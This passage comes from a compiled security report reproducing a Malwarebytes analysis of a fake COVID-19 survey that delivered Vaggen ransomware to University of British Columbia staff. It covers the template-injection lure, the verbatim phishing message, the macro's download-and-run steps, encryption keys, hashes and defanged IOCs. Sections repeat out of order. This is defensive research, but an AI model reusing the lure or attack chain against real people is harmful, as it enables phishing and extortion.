hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1326 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1327 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1328 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1329 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1330 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1331 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1332 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1333 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1334 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1335 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1336 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1337 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1338 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1339 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1340 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1341 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1342 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1343 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1344 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1345 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1346 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1347 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1348 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1349 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1350 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1351 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1352 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1353 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1354 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1355 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1356 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1357 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1358 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1359 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the 